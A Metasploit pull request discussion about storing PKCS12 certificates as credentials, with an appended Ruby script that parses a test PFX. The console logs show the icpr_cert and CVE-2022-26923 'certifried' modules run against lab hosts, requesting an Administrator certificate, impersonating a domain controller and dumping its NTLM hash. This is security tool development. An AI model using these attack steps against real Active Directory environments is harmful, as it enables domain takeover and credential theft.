
Persist icpr cert as pkcs12 credential #17353

Merged

Conversation

adfoster-r7
Contributor

@adfoster-r7 adfoster-r7 commented Dec 9, 2022

Add support for persisting pkcs12 credentials in Metasploit. Updates the admin/dcerpc/icpr_cert module to persist requested certificates.

Depends on rapid7/metasploit-credential#169

Example:

msf6 auxiliary(admin/dcerpc/icpr_cert) > rerun smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ca=adf3-DC3-CA cert_template=ESC1-Test smbdomain=ADF3.LOCAL alt_upn=Administrator@adf3.local
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:445 - Requesting a certificate...
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate UPN: Administrator@adf3.local
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20221209012934_default_unknown_windows.ad.cs_070132.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > creds
Credentials
===========

host            origin          service        public                    private                                                              realm  private_type  JtR Format
----            ------          -------        ------                    -------                                                              -----  ------------  ----------
192.168.123.13  192.168.123.13  445/tcp (smb)  Administrator@adf3.local  subject: /CN=Administrator,issuer: /DC=local/DC=adf3/CN=adf3-DC3-CA         Pkcs12 (pfx)  

The pfx base64 blob is output with creds -v or creds -o foo.txt after #17355 is merged

Verification

@adfoster-r7 adfoster-r7 marked this pull request as draft December 9, 2022 01:40
@gwillcox-r7 gwillcox-r7 added the feature-kerberos-authentication Adds Kerberos Authentication support to framework label Jan 5, 2023
@adfoster-r7
Contributor Author

This will most likely land into master after the kerberos branch is merged, taking off the feature label for now 👍

@adfoster-r7 adfoster-r7 added feature-kerberos-authentication Adds Kerberos Authentication support to framework and removed feature-kerberos-authentication Adds Kerberos Authentication support to framework labels Jan 20, 2023
@adfoster-r7 adfoster-r7 changed the base branch from feature-kerberos-authentication to master February 3, 2023 00:42
@adfoster-r7 adfoster-r7 force-pushed the persist-icpr-cert-as-pkcs12-credential branch from 2e0ae17 to e6e6c41 Compare February 3, 2023 00:42
Update creds command to support pkcs12
@adfoster-r7 adfoster-r7 force-pushed the persist-icpr-cert-as-pkcs12-credential branch from e6e6c41 to 875ad34 Compare April 11, 2023 15:27
@adfoster-r7 adfoster-r7 marked this pull request as ready for review April 11, 2023 15:27
@dwelch-r7
Contributor

dwelch-r7 commented Apr 12, 2023

I'm running into an error here:

msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.176.3

[+] [2023.04.12-11:44:19] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully created windomain.local\DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:22] 192.168.176.3:445 -   Password: mb4WQRCUxMUP5Uz1Yuhl2YZVQa3tazYf
[+] [2023.04.12-11:44:22] 192.168.176.3:445 -   SID:      S-1-5-21-2380665626-1154582258-49301182-1149
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[*] [2023.04.12-11:44:22] 192.168.176.3:445 - Attempting to set the DNS hostname for the computer DESKTOP-EPLXTSOP$ to the DNS hostname for the DC: dc2019
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully changed the DNS hostname
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - The requested certificate was issued.
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate SID: S-1-5-21-2380665626-1154582258-49301182-1149
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate stored at: /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_windows.ad.cs_298084.pfx
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Attempting PKINIT login for dc2019$@windomain.local
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Successfully authenticated with certificate
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGT MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_288354.bin
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Trying to retrieve NT hash for dc2019$
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:88 - Received a valid TGS-Response
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGS MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_236126.bin
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Found NTLM hash for dc2019$: aad3b435b51404eeaad3b435b51404ee:ab60af0d9ee0336f8cc7df44c9f7caed
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Deleting the computer account DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:25] 192.168.176.3:445 - The specified computer has been deleted.
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Call stack:
[-] [2023.04.12-11:44:25] 192.168.176.3:445 -   /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:425:in `report_ntlm'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 -   /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:421:in `get_ntlm_hash'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 -   /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:124:in `run'
[*] Auxiliary module execution completed

jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)

FWIW though it did correctly add the PFX to the database

@adfoster-r7
Contributor Author

> I'm running into an error here:
> ...
> [-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes

Looks like a regression from #17784 - will put up a separate PR to fix

@dwelch-r7
Contributor

Tested all the scenarios, works well for me

@dwelch-r7 dwelch-r7 merged commit 275963e into rapid7:master Apr 12, 2023
@dwelch-r7 dwelch-r7 added the rn-enhancement release notes enhancement label Apr 12, 2023
@dwelch-r7
Contributor

dwelch-r7 commented Apr 12, 2023

Release Notes

Adds support for persisting pkcs12 credentials in Metasploit, i.e. .pfx/.p12 files. The auxiliary/admin/dcerpc/icpr_cert and auxiliary/admin/dcerpc/cve_2022_26923_certifried modules will now persist requested certificates for future exploitation. The creds command can also directly persist certificates - for example: creds add user:alice pkcs12:/path/to/certificate.pfx
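The creds table in the PR description shows what a stored Pkcs12 credential looks like: the public part is the certificate UPN, the private part is the subject and issuer, and the type is Pkcs12 (pfx); the release notes add that `creds add ... pkcs12:/path/to/certificate.pfx` imports such a file directly. The following stand-alone Ruby script is an added example, not code from this PR or from the Metasploit project. It constructs a throwaway PFX whose names mirror the session above (the `adf3-DC3-CA` issuer, `/CN=Administrator` subject and `Administrator@adf3.local` UPN come from the page; the password `s3cret`, the friendly name, the key sizes and all function names are assumptions), then extracts the same fields a reviewer would want when inventorying certificate files found in loot, and returns nil rather than raising when the PFX password is wrong.

```ruby
require 'openssl'

# Microsoft User Principal Name otherName OID carried in AD CS certificates.
UPN_OID = '1.3.6.1.4.1.311.20.2.3'.freeze

# Build a subjectAltName extension holding one UPN otherName:
# GeneralName ::= [0] otherName { type-id OID, value [0] EXPLICIT UTF8String }
def upn_san_extension(upn)
  other_name = OpenSSL::ASN1::ASN1Data.new(
    [
      OpenSSL::ASN1::ObjectId.new(UPN_OID),
      OpenSSL::ASN1::ASN1Data.new([OpenSSL::ASN1::UTF8String.new(upn)], 0, :CONTEXT_SPECIFIC)
    ],
    0, :CONTEXT_SPECIFIC
  )
  san = OpenSSL::ASN1::Sequence.new([other_name])
  OpenSSL::X509::Extension.new('subjectAltName', san.to_der)
end

# Constructed fixture (assumption): a throwaway CA key signs a leaf certificate
# whose names mirror the PR description; nothing here comes from a real CA.
def build_test_pfx(password, upn: 'Administrator@adf3.local')
  ca_key = OpenSSL::PKey::RSA.new(2048)
  leaf_key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = OpenSSL::X509::Name.parse('/CN=Administrator')
  cert.issuer = OpenSSL::X509::Name.parse('/DC=local/DC=adf3/CN=adf3-DC3-CA')
  cert.public_key = leaf_key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  cert.add_extension(upn_san_extension(upn))
  cert.sign(ca_key, OpenSSL::Digest.new('SHA256'))
  OpenSSL::PKCS12.create(password, 'ad-cs-test', leaf_key, cert).to_der
end

# Walk the SAN extension's DER and return the UPN string, or nil if absent.
def extract_upn(cert)
  ext = cert.extensions.find { |e| e.oid == 'subjectAltName' }
  return nil unless ext

  # Extension ::= SEQUENCE { extnID OID, [critical BOOLEAN], extnValue OCTET STRING }
  extn_value = OpenSSL::ASN1.decode(ext.to_der).value.last.value
  OpenSSL::ASN1.decode(extn_value).value.each do |general_name|
    next unless general_name.tag_class == :CONTEXT_SPECIFIC && general_name.tag == 0

    type_id, wrapped_value = general_name.value
    next unless type_id.oid == UPN_OID

    return wrapped_value.value.first.value # unwrap the [0] EXPLICIT around the UTF8String
  end
  nil
end

# Produce the fields a Pkcs12 credential record displays: UPN as the public
# part, subject and issuer as the private part, plus whether a key is present.
# A wrong password yields nil instead of an exception so callers can report it.
def summarize_pkcs12(der, password)
  p12 = OpenSSL::PKCS12.new(der, password)
  cert = p12.certificate
  {
    public: extract_upn(cert),
    private: "subject: #{cert.subject},issuer: #{cert.issuer}",
    private_type: 'Pkcs12 (pfx)',
    has_key: !p12.key.nil?
  }
rescue OpenSSL::PKCS12::PKCS12Error
  nil
end

if __FILE__ == $PROGRAM_NAME
  der = build_test_pfx('s3cret')
  p summarize_pkcs12(der, 's3cret')
  p summarize_pkcs12(der, 'wrong-password')
end
```

The subject and issuer strings come from `OpenSSL::X509::Name#to_s`, which uses the same slash-separated form seen in the creds table, so the `private` field reproduces the row from the PR description exactly. The UPN is read from the raw ASN.1 rather than from the extension's text rendering because OpenSSL versions differ in how they print otherName entries.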
